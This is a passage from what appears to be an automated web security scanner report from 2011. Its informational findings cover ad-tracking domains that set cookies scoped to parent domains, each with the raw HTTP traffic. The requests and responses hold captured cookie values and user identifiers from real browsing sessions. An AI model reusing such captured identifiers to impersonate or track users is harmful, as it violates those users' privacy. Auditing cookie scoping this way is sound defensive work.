hdIQyl8PAVpRTybX7JAshdBwKaDDEb4sUVtdjwGVHVIgqcddax+1w=; Domain=.revsci.net; Expires=Sun, 22-Jul-2012 04:30:59 GMT; Path=/
Last-Modified: Sat, 23 Jul 2011 04:30:59 GMT
Cache-Control: max-age=3600, private
Expires: Sat, 23 Jul 2011 05:30:59 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 23 Jul 2011 04:30:58 GMT
Content-Length: 6105

//AG-develop 12.7.1-48 (2011-07-13 07:11:32 UTC)
var rsi_now= new Date();
var rsi_csid= 'G07608';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da)
...[SNIP]...

10.119. http://leadback.advertising.com/adcedge/lb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://leadback.advertising.com
Path:	/adcedge/lb

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=uUdKOFriDs7mGTukCfASbXUqH0t1Fl6B8opRpeAtZaUqHwa4Fl6BkFeRpewSaaUqHUlmGl6BYGeRpeAghXUqH0NYGl6BYimRpeA3WaUqHIcgGl6BjKrRpeQwBaUqHcbgGl6B25lRpegsZaUqHE1lGl6BecpRpeARXaUqHcxvGl6BY8rRpeQjWaUqHYxvGl6BKopRpeQRgaUqHI0rGl6BNppRpeQ2kXUqHQTnGlakBwl5IaIeNSvB73cRYYrxIUOuGAnreEAL/ZIfGeLJrAaxR0qyFcydGN6sEXwQpacpx2TBrTpxcD7+Gg5kGNC; domain=advertising.com; expires=Sun, 21-Jul-2013 19:53:18 GMT; path=/
GUID=MTMxMTM2NDM5ODsxOjE2dDUxa28wOTRrMGt1OjM2NQ; domain=advertising.com; expires=Sun, 21-Jul-2013 19:53:18 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=b7d3a7ab_NDM_cs=retargeting_unconverted[720]&betq=14022=440549[720] HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.silverpop.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; BASE=x7Q9li23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTnNpoJelwzRy2jXxpCjSTvy2vvQPe3CXriTJTVZJe3b9kteZzetrE0PruvuW/uL417rbJCEJ/mGqj6boqFpLsBbQyh7YWx9FEFLlLBGc6Orr8TEN1wtPCzrgH35WYZtJQXGgesexvoE/9NE6rEl+S7iIe0KcOFQJ2nMu/hGUPkWK/dUKlsP70CJiL3g+HKdqe5O8EnQu/tmZwQgGe58OYixGNBw/wyrzmZUVXDHGlSlhRmkV0gqcdsXQ4BFhMEVKLAq2gMOb4E!; ROLL=U6APBjemptEWMBhgHVl29d+IN3DmoxK!; F1=BsC2e4EBAAAABAAAAUAAgEA; C2=sCjJOFriEs7mGuqkCjASbXAcI0t1FAHC8opBwhAtZaAcIwa4FAHCkFeBwhwSaaAcIUlmGAHCYGeBwhAghXAcI0NYGAHCYimBwhA3WaAcIIcgGAHCjKrBwhQwBaAcIcbgGAHC25lBwhgsZaAcIE1lGAHCecpBwhARXaAcIcxvGAHCY8rBwhQjWaAcIYxvGAHCKopBwhQRgaAcII0rGAHCNppBwhQ2kXAcIQTnGAXkB0l5Ia0PNSvB73cBfPbYA8IpGMgreIAL/Z0QGeLJrAahY3qyGcydGo2sEbwQpaIbx2jBrTphjC7+Gg5kGoO; GUID=MTMxMTEyNTY3NjsxOjE2dDUxa28wOTRrMGt1OjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 22 Jul 2011 19:53:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=uUdKOFriDs7mGTukCfASbXUqH0t1Fl6B8opRpeAtZaUqHwa4Fl6BkFeRpewSaaUqHUlmGl6BYGeRpeAghXUqH0NYGl6BYimRpeA3WaUqHIcgGl6BjKrRpeQwBaUqHcbgGl6B25lRpegsZaUqHE1lGl6BecpRpeARXaUqHcxvGl6BY8rRpeQjWaUqHYxvGl6BKopRpeQRgaUqHI0rGl6BNppRpeQ2kXUqHQTnGlakBwl5IaIeNSvB73cRYYrxIUOuGAnreEAL/ZIfGeLJrAaxR0qyFcydGN6sEXwQpacpx2TBrTpxcD7+Gg5kGNC; domain=advertising.com; expires=Sun, 21-Jul-2013 19:53:18 GMT; path=/
Set-Cookie: GUID=MTMxMTM2NDM5ODsxOjE2dDUxa28wOTRrMGt1OjM2NQ; domain=advertising.com; expires=Sun, 21-Jul-2013 19:53:18 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Fri, 22 Jul 2011 20:53:18 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

10.120. http://lifescript.us.intellitxt.com/intellitxt/front.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifescript.us.intellitxt.com
Path:	/intellitxt/front.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

VM_USR="AKdo0GgCJUYDq4t2/GN0I5MAADtIAAA7hAIAAAExTiWzMgA-"; Version=1; Domain=.intellitxt.com; Max-Age=5184000; Expires=Mon, 19-Sep-2011 19:21:58 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /intellitxt/front.asp?ipid=18057 HTTP/1.1
Host: lifescript.us.intellitxt.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx?utm_source=outbrain&utm_medium=cpc&utm_campaign=ADHD_Adult

Response

10.121. http://lm.trafficmp.com/clicksense/epic previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lm.trafficmp.com
Path:	/clicksense/epic

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

T_kuyx=21971%3Acvq%3A1; Domain=trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:16 GMT; Path=/
2=35BqvhzfiVY; Domain=.trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:16 GMT; Path=/
AP_OTA4MzY0XzMwMHgyNTA=CNeb7-6UJhDLy9G-3fn2pjEYiv43IGwoyAEwADoDqO4F; Domain=.trafficmp.com; Expires=Thu, 21-Jul-2011 18:01:21 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /clicksense/epic?et=kx3bm41vejeq&s=4709&adsize=300x250&cid=83303&pid=21462&ipb=0&url=http%3A%2F%2Fgames.myyearbook.com%2F&c=http://media.trafficmp.com/a/click?_-611797114104433*_3107*levM_99*sPC_115*Byp_3443735*lpF_3247**kx3bm41vejeq___3533310**0_3805*MEn_114**_-862839443 HTTP/1.1
Host: lm.trafficmp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: nab=7; nap=0; nat=1297260496902; rth=2-looqid-h1d~cvp~1~1-22063~cvm~1~0-dlx~0~1~1-; uid2=44292bea5-fe46-48cd-938b-a04020fccabc-gqdr4ema; dly2=3-lop3e2-; dmg2=2-null7566%4052%4076+57%3A56%3A69%3ACZ+%7Cnulll%7CHHF%7CX357%7CIIG%7CQ599.055%7CS50127%7C1fbsgynlre.pbz%7CJ078%7CWfbsgynlre+grpuabybtvrf+vap.%7CLfgbjr%7CR%40527.191%7Cnull%40955%7CDoebnqonaq%7CZ%3F%7C-; hst2=3-lop3e2-1~kx3bm41vejeq~3mt~5al7~0-1~1ksbhusx5p0nk~3mu~5al9~5-; pct=1-vOrunivbe~gqe1232m-yhpvq~gqe1232n-; 2=35BqvhzfiVY; AP_OTA4MzY0XzcyOHg5MA=CP727u6UJhDZxOnwt_f2pjEYi_43IGwoyAEwADoDqe4F; T_igy5=h1d%3Acvp%3A1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
Pragma: no-cache
Date: Thu, 21 Jul 2011 18:01:15 GMT
Expires: Thu, 21 Jul 2011 18:01:15 GMT
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: T_igy5=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_bzbi=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_f1le=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_jayi=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_d2qq=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_kuyx=21971%3Acvq%3A1; Domain=trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:16 GMT; Path=/
Set-Cookie: 2=35BqvhzfiVY; Domain=.trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:16 GMT; Path=/
Set-Cookie: AP_OTA4MzY0XzMwMHgyNTA=CNeb7-6UJhDLy9G-3fn2pjEYiv43IGwoyAEwADoDqO4F; Domain=.trafficmp.com; Expires=Thu, 21-Jul-2011 18:01:21 GMT; Path=/
Content-Type: text/javascript
Content-Length: 548
Connection: close

document.write('<iframe marginheight=\"0\" marginwidth=\"0\" scrolling=\"no\" frameborder=\"0\" width=\"300\" height=\"250\" src=\"http://a.netmng.com/hic/?nm_width=300&nm_height=250&nm_publ=178&nm_c=
...[SNIP]...

10.122. http://load.exelator.com/load/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://load.exelator.com
Path:	/load/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TFF=eJxLtLKwqi62MjSyUjI0MHEwNjZwsLS0NFKyTrQysqrOtDK0BmIzM2MgZQBj1mKoNwSpN0ZTb2QN4SLrM4drI04HkDYwwaES3U1As1MjUnMSS1JxmY3LF0aGpPkaqh6nr42w%252BxqojTgdtQAPgWet; expires=Fri, 18-Nov-2011 18:43:40 GMT; path=/; domain=.exelator.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /load/?p=104&g=210&j=0 HTTP/1.1
Host: load.exelator.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/landing/pool
Cookie: xltl=eJw1y8ENgCAMQNFdmMBSLLSeTDzoAA7QAl3Ao3F3iYm3f3hfJcp9CUo4jy0so6IEzow9gbIjgjohWy5ai0Uis%252BSfG8e6%252F0dzBYABU4GOXJ3TzJmoaZvmHi0szwvRehv1; BFF=eJxLtDK1qi62MjS0UgoxNDBxdHewtLQ0UrLOtDI0MzO2BsoYWyn5%252BvuFePhExod5BnuGKFknWpnh12MGk0A2B0W1MbKMAUTGD90YU6g4LrUIQ2rJMh%252BXYQB8WkJc; TFF=eJxLtLKwqi62MjSyUjI0MHEwNjZwsLS0NFKyTrQysqrOtDK0BmIzM2MgZQBj1mKoNwSpN0ZTb2QN4SLrM4drI04HkDYwwaHSCNPs1IjUnMSSVFxmo%252BuA%252BcLIkDRfQ9WT6mugNuJ01AIADa1nqQ%253D%253D

Response

HTTP/1.1 302 Found
X-Cnection: close
X-Powered-By: PHP/5.2.1
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: image/gif
Set-Cookie: TFF=eJxLtLKwqi62MjSyUjI0MHEwNjZwsLS0NFKyTrQysqrOtDK0BmIzM2MgZQBj1mKoNwSpN0ZTb2QN4SLrM4drI04HkDYwwaES3U1As1MjUnMSS1JxmY3LF0aGpPkaqh6nr42w%252BxqojTgdtQAPgWet; expires=Fri, 18-Nov-2011 18:43:40 GMT; path=/; domain=.exelator.com
Location: http://a.collective-media.net/datapair?net=ex&segs=&op=add
Content-Length: 0
Date: Thu, 21 Jul 2011 18:43:40 GMT
Server: HTTP server

10.123. http://m.adnxs.com/msftcookiehandler previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://m.adnxs.com
Path:	/msftcookiehandler

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uuid2=6516234360771219075; path=/; expires=Wed, 19-Oct-2011 18:42:40 GMT; domain=.adnxs.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /msftcookiehandler?t=1&c=MUID%3d1FDD375D440B439987A467BECD35D2C6 HTTP/1.1
Host: m.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/advertising/default.php?n=TribalFusion&section=None&size=728x90&site=MYB&sub=Network
Cookie: sess=1; uuid2=6516234360771219075; anj=Kfu=8fG2<rcvjr/?0P(*AuB-u**g1:XIB_LEhzW%<rg(XV)`CZ8D]ccqzB-6O8z_!o8J2McQT/AO0qb`?Werk8MLb?.YT-A[C-9NtjX!!g[P's06h<>c)B@V8I%-UY1%%5; icu=ChEIz34QChgCIAIoAjCO5qHxBBCO5qHxBBgB; acb447131=5_[r^XI()v^9#a*>bPMv<XU>X?enc=AAAAAAAA8D_NzMzMzMzsPwAAAMDMzARAzczMzMzM7D8AAAAAAADwP-o1qkQFEIZsg472aqBQbloNcyhOAAAAAAw8AwA3AQAA3QEAAAIAAABNfgYA510AAAEAAABVU0QAVVNEAKAAWAIlDQAAZgwBAgUCAQUAAAAAFSDnwQAAAAA.&tt_code=cm.yearbook&udj=uf%28%27a%27%2C+1267%2C+1311273741%29%3Buf%28%27c%27%2C+39654%2C+1311273741%29%3Buf%28%27r%27%2C+425549%2C+1311273741%29%3Bppv%281279%2C+%277819955417788331498%27%2C+1311273741%2C+1311878541%2C+39654%2C+24039%29%3Bppv%285150%2C+%277819955417788331498%27%2C+1311273741%2C+1311360141%2C+39654%2C+24039%29%3B&cnd=!wRzA7QjmtQIQzfwZGAAg57sBMAE4pRpAAEjdA1CM-AxYAGBLaABwAHgAgAEAiAEAkAEBmAEBoAECqAEDsAEAuQEAAAAAAADwP8EBAAAAAAAA8D_JAZqZmZmZmfE_2QEAAAAAAADwP-ABAA..&ccd=!cwVkLQjmtQIQzfwZGOe7ASAA; acb830793=5_[r^kI/7ZdzkzB7=/Cb<tqGY?enc=bYlccAb_6z98SFOYUjLpPwAAAMDMzARAfEhTmFIy6T9uiVxwBv_rP-_NrhooA3Y_g472aqBQbloOcyhOAAAAAAw8AwA3AQAAZAAAAAIAAAC2awgA510AAAEAAABVU0QAVVNEANgCWgCqAQAAiBABAgUCAQUAAAAAcCHMDAAAAAA.&tt_code=cm.yearbook&udj=uf%28%27a%27%2C+27%2C+1311273742%29%3Buf%28%27r%27%2C+551862%2C+1311273742%29%3Bppv%2882%2C+%274572845942422556143%27%2C+1311273742%2C+1321641742%2C+66647%2C+24039%29%3Bppv%2884%2C+%274572845942422556143%27%2C+1311273742%2C+1321641742%2C+66647%2C+24039%29%3Bppv%2811%2C+%274572845942422556143%27%2C+1311273742%2C+1321641742%2C+66647%2C+24039%29%3Bppv%2882%2C+%274572845942422556143%27%2C+1311273742%2C+1321641742%2C+66647%2C+24039%29%3Bppv%2884%2C+%274572845942422556143%27%2C+1311273742%2C+1321641742%2C+66647%2C+24039%29%3B&cnd=!6R9uLQjXiAQQttchGAAg57sBMAM4qgNAAEhkUIz4DFgAYEtoAHAAeACAAQCIAQCQAQGYAQGgAQSoAQOwAQC5AQHJSSsG_-s_wQEByUkrBv_rP8kBCtejcD0K8z_ZAQAAAAAAAPA_4AHhHQ..&ccd=!BQXcKAjXiAQQttchGOe7ASAA&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E66647

Response

10.124. http://media.fastclick.net/w/get.media previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.fastclick.net
Path:	/w/get.media

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

pjw=BAIAAAACIAMDQnMoTiAGAQABIAMCkRMDYAcCLWEIIA2AEwA/4AIfATjZgB8CUTQHIB1AHwEAAA==; domain=.fastclick.net; path=/; expires=Sat, 23-Jul-2011 18:43:14 GMT
vt=10070:252216:472145:38735:0:1311273791:1|9930:201617:549165:38735:0:1311273794:1|; domain=.fastclick.net; path=/; expires=Sat, 20-Aug-2011 18:43:14 GMT
adv_ic=BwIAAABCcyhOIAYGAAFJAAA1TyAHIAtAAAA/4AIXARtZwBcBAAA=; domain=.fastclick.net; path=/; expires=Sat, 20-Aug-2011 18:43:14 GMT
pluto=571814024282|v1; domain=.fastclick.net; path=/; expires=Sat, 20-Jul-2013 18:43:14 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /w/get.media?sid=38735&m=1&tp=5&d=j&t=n&no_cj_c=1&upsid=571814024282 HTTP/1.1
Host: media.fastclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/landing/pool
Cookie: pluto2=559266702931; lyc=AwAAAAThKChOACAAAclYIASgAAWQUAAAfingCRcBfUugICAA4AUvAQAA; pluto=559266702931

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:43:14 GMT
Content-Type: application/x-javascript
P3P: CP="NOI DSP DEVo TAIo COR PSA OUR IND NAV"
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 327
Set-Cookie: pjw=BAIAAAACIAMDQnMoTiAGAQABIAMCkRMDYAcCLWEIIA2AEwA/4AIfATjZgB8CUTQHIB1AHwEAAA==; domain=.fastclick.net; path=/; expires=Sat, 23-Jul-2011 18:43:14 GMT
Set-Cookie: vt=10070:252216:472145:38735:0:1311273791:1|9930:201617:549165:38735:0:1311273794:1|; domain=.fastclick.net; path=/; expires=Sat, 20-Aug-2011 18:43:14 GMT
Set-Cookie: adv_ic=BwIAAABCcyhOIAYGAAFJAAA1TyAHIAtAAAA/4AIXARtZwBcBAAA=; domain=.fastclick.net; path=/; expires=Sat, 20-Aug-2011 18:43:14 GMT
Set-Cookie: pluto=571814024282|v1; domain=.fastclick.net; path=/; expires=Sat, 20-Jul-2013 18:43:14 GMT
Set-Cookie: pluto2=; domain=.fastclick.net; path=/; expires=Thu, 21-Dec-1972 00:00:00 GMT

{var dz=document;
dz.writeln("<script language=\"JavaScript\" type=\"text/javascript\" src=\"http://fw.adsafeprotected.com/rjss/at/10270/119307/M0N/jview/335221741/direct/01/20110721184314/?click=http
...[SNIP]...

10.125. http://media.trafficmp.com/a/js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.trafficmp.com
Path:	/a/js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

T_4hgv=h1d%3Acvl%3A1; Domain=trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:10 GMT; Path=/
dly2=3-lop3dy-; Domain=trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:10 GMT; Path=/
dmg2=2-null7566%4052%4076+57%3A56%3A65%3ACZ+%7Cnulll%7CHHF%7CX357%7CIIG%7CQ599.055%7CS50127%7C1fbsgynlre.pbz%7CJ078%7CWfbsgynlre+grpuabybtvrf+vap.%7CLfgbjr%7CR%40527.191%7Cnull%40955%7CDoebnqonaq%7CZ%3F%7C-; Domain=trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:10 GMT; Path=/
hst2=3-lop3dy-1~d188rsjo2prx~3mu~5al9~0-1~1ksbhusx5p0nk~3mu~5al9~1-; Domain=trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:10 GMT; Path=/
pct=1-vOrunivbe~gqe1232m-yhpvq~gqe1232n-; Domain=trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:10 GMT; Path=/
rth=2-looqid-h1d~cvl~1~1-dlx~0~1~1-; Domain=trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:10 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/js?plid=4710&adsize=728x90&network=456.4135&url=http%3A%2F%2Fwww.myyearbook.com%2Fadvertising%2Fdefault.php%3Fn%3DTribalFusion%26section%3DNone%26size%3D728x90%26site%3DMYB%26sub%3DNetwork&ref=&c= HTTP/1.1
Host: media.trafficmp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/advertising/default.php?n=Pubmatic&section=None&size=728x90&site=MYB
Cookie: nab=7; nap=0; nat=1297260496902; T_bzbi=dlx%3A0%3A1; rth=2-looqid-dlx~0~1~1-; uid2=44292bea5-fe46-48cd-938b-a04020fccabc-gqdr4ema

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Date: Thu, 21 Jul 2011 18:01:09 GMT
Pragma: no-cache
Connection: close
Set-Cookie: T_bzbi=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_f1le=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_4hgv=h1d%3Acvl%3A1; Domain=trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:10 GMT; Path=/
Set-Cookie: dly2=3-lop3dy-; Domain=trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:10 GMT; Path=/
Set-Cookie: dmg2=2-null7566%4052%4076+57%3A56%3A65%3ACZ+%7Cnulll%7CHHF%7CX357%7CIIG%7CQ599.055%7CS50127%7C1fbsgynlre.pbz%7CJ078%7CWfbsgynlre+grpuabybtvrf+vap.%7CLfgbjr%7CR%40527.191%7Cnull%40955%7CDoebnqonaq%7CZ%3F%7C-; Domain=trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:10 GMT; Path=/
Set-Cookie: hst2=3-lop3dy-1~d188rsjo2prx~3mu~5al9~0-1~1ksbhusx5p0nk~3mu~5al9~1-; Domain=trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:10 GMT; Path=/
Set-Cookie: pct=1-vOrunivbe~gqe1232m-yhpvq~gqe1232n-; Domain=trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:10 GMT; Path=/
Set-Cookie: rth=2-looqid-h1d~cvl~1~1-dlx~0~1~1-; Domain=trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:10 GMT; Path=/
Content-Length: 15369

document.write('\<img src=\"http://lm.trafficmp.com/clicksense/images/pixel.png?epic=323866621528900608\&et=d188rsjo2prx\" height=\"1\" width=\"1\"/\> \<scr');
document.write('ipt type=\"text/javasc
...[SNIP]...

10.126. http://media.trafficmp.com/a/js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.trafficmp.com
Path:	/a/js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

T_f2eb=h1d%3Acvq%3A1; Domain=trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:15 GMT; Path=/
dly2=3-lop3e3-; Domain=trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:15 GMT; Path=/
dmg2=2-null7566%4052%4076+57%3A56%3A60%3ACZ+%7Cnulll%7CHHF%7CX357%7CIIG%7CQ599.055%7CS50127%7C1fbsgynlre.pbz%7CJ078%7CWfbsgynlre+grpuabybtvrf+vap.%7CLfgbjr%7CR%40527.191%7Cnull%40955%7CDoebnqonaq%7CZ%3F%7C-; Domain=trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:15 GMT; Path=/
hst2=3-lop3e3-1~89jazr1df64m~3mt~5al7~0-1~kx3bm41vejeq~3mt~5al7~1-1~1ksbhusx5p0nk~3mu~5al9~6-; Domain=trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:15 GMT; Path=/
pct=1-vOrunivbe~gqe1232m-yhpvq~gqe1232n-; Domain=trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:15 GMT; Path=/
rth=2-looqid-h1d~cvq~1~1-22063~cvm~1~0-dlx~0~1~1-; Domain=trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:15 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/js?plid=4709&adsize=300x250&network=456.4135&url=http%3A%2F%2Fgames.myyearbook.com%2F&ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&c= HTTP/1.1
Host: media.trafficmp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: nab=7; nap=0; nat=1297260496902; rth=2-looqid-h1d~cvk~1~1-dlx~0~1~1-; uid2=44292bea5-fe46-48cd-938b-a04020fccabc-gqdr4ema; dly2=3-lop3dx-; dmg2=2-null7566%4052%4076+57%3A56%3A54%3ACZ+%7Cnulll%7CHHF%7CX357%7CIIG%7CQ599.055%7CS50127%7C1fbsgynlre.pbz%7CJ078%7CWfbsgynlre+grpuabybtvrf+vap.%7CLfgbjr%7CR%40527.191%7Cnull%40955%7CDoebnqonaq%7CZ%3F%7C-; hst2=3-lop3dx-1~1ksbhusx5p0nk~3mu~5al9~0-; pct=1-vOrunivbe~gqe1232m-yhpvq~gqe1232n-; T_jayi=22063%3Acvm%3A1; 2=35BqvhzfiVY; AP_OTA4MzY0XzcyOHg5MA=CP727u6UJhDZxOnwt_f2pjEYi_43IGwoyAEwADoDqe4F

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Date: Thu, 21 Jul 2011 18:01:14 GMT
Pragma: no-cache
Connection: close
Set-Cookie: T_jayi=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_bzbi=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_f1le=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_igy5=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_f2eb=h1d%3Acvq%3A1; Domain=trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:15 GMT; Path=/
Set-Cookie: dly2=3-lop3e3-; Domain=trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:15 GMT; Path=/
